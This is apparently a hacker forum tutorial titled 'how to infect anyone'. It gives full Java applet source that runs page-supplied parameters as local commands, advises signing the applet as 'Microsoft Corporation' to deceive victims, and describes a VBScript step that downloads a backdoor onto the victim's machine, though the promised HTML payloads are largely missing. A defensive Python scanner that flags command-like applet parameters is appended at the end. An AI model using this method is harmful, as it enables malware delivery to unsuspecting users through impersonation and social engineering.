Hi. This is a minimalistic guide on "how to infect anyone". This is not a 0day. It's a pwning method which is one click away from the victim. It is pretty simple and the best of all, it takes no time at all. (And it is undetectable too if you do it right)

After a few attempts to think of a way to infect specific (or any) computer systems, I found that Java could be THE solution. I am not a Java Programmer/Developer or whatever but this piece of code is pretty easy to be read by anyone who had a little programming experience. The question "how to infect someone" is the hardest one, when you are coding your new backdoor/trojan or whatever malware. I mean... ok, you have your new backdoor compiled. You've tested it and it works great. But how the hell can you spread it??? There are several methods, but nothing is invisible from the user's eye. And that's because all the well known methods are... WELL KNOWN

Ok, let me go with the subject and show you how it's done. I've developed the 80% of this attack (at least) and I say 80 because the backdoor server I use isn't made by me, and the vbscript is from a googled page. Anyway, the Java code has been written by me and the "idea" is also my "product". So be gentle with this :PpPPp.

I won't explain the meaning of what does every single line of code here, because I don't want to and because you must understand by yourself how it works. Any other explanation on the codes, will be useless if you can't read the source code by yourself. (I speak English by myself for example p no one taught me how it's done. It just happens.) (Little crappy but I hope you understand anywayz)

1) The official Java compiler (and the rest of Java developer tools) take a look at: How to set up your computer for doing Java
2) Basic HTML/Java/VBScripting knowledge
3) Java Runtimes
4) Web Browser
5) Hosting for the tests
6) A backdoor uploaded to your host
7) Mind
8) Coffee

The process

1) Create a java file with the following code inside and name it whatever you want (I faced problems with the THIRD parameter, cut it to the second one or just use it as it is. Works fine for me...).

    import java.applet.*;
    import java.awt.*;
    import java.io.*;

    public class skata extends Applet {
        public void init() {
            // The value of the page's "first" <param> is run as a local command.
            Process f;
            String first = getParameter("first");
            try {
                f = Runtime.getRuntime().exec(first);
            } catch (IOException e) {
                e.printStackTrace();
            }
            // Same for the "second" <param>.
            Process s;
            String second = getParameter("second");
            try {
                s = Runtime.getRuntime().exec(second);
            } catch (IOException e) {
                e.printStackTrace();
            }
            // Same for the "third" <param>.
            Process t;
            String third = getParameter("third");
            try {
                t = Runtime.getRuntime().exec(third);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

2) Compile your java applet with the java developer tools and sign it too. A good name could be "Microsoft Corporation" or something.
3) Upload your signed/compiled applet to your host and your backdoor too.
4) Open notepad and paste the following html code. (change the YOUR-JAVA-APPLET-NAME with your own java filename)

</applet>

5) Upload it as .htm to your host and browse it. You will see the Java Security warning. Click RUN.... BooM! Calculator and cmd spawned!
6) Have in mind that THIS warning comes out in EVERY java applet you are running. EITHER A JAVA GAME or a JAVA IRC CLIENT.
7) Change the .htm code into something like the following (Take a look, it's a vbscript echoed from cmd.exe - this will download our backdoor).

CONCLUSION

It's a big mistake to think that you are safe with your new antivirus or your brand new million-dollar anti-whatever system. This is not any kind of exploitation. It's just a social engineering-like attack. I see 10 of these warnings every day on the net. Either I want to play a game and kill my time or whatever I want to do with a java applet. It's nothing strange or special than that. But hello, there is a "hole" on this. You can execute LOCAL, anything you want FOR FUCK'S SAKE! I have a Proof of Concept page out there... it will execute calc.exe and cmd.exe on your computer.
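
Seen from the defending side, the applet above gives itself away in the page markup: its <param> values are command lines rather than settings. The following detection sketch is an added example, not part of the original post; the token list, the names AppletParamScanner and scan_html, and both sample pages are constructed assumptions.

```python
import re
from html.parser import HTMLParser

# Assumed heuristic: program names and extensions that a legitimate
# applet setting (a level, a colour, a server name) would not contain.
SUSPICIOUS = re.compile(
    r"\b(cmd|calc|powershell|wscript|cscript|mshta)(\.exe)?\b"
    r"|\.(exe|vbs|bat|cmd|ps1)\b",
    re.IGNORECASE,
)

class AppletParamScanner(HTMLParser):
    """Flags command-like <param> values inside <applet>/<object> elements."""

    def __init__(self):
        super().__init__()
        self.container = None  # code/archive of the applet currently open
        self.findings = []     # (applet, param name, param value)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("applet", "object"):
            self.container = a.get("code") or a.get("archive") or "?"
        elif tag == "param" and self.container is not None:
            value = a.get("value") or ""
            if SUSPICIOUS.search(value):
                self.findings.append((self.container, a.get("name"), value))

    def handle_endtag(self, tag):
        if tag in ("applet", "object"):
            self.container = None

def scan_html(html):
    """Return every suspicious applet parameter found in one HTML document."""
    scanner = AppletParamScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample pages (not taken from the original post).
SAMPLE_FLAGGED = ('<applet code="Example.class">'
                  '<param name="first" value="calc.exe">'
                  '<param name="second" value="cmd.exe"></applet>')
SAMPLE_BENIGN = ('<applet code="Chess.class">'
                 '<param name="level" value="3">'
                 '<param name="theme" value="wood"></applet>')

if __name__ == "__main__":
    for applet, name, value in scan_html(SAMPLE_FLAGGED):
        print(f"ALERT applet={applet} param={name} value={value!r}")
```

Run over proxy or mail-gateway captures, a hit is a reason to block the page before the Java security dialog ever reaches the user.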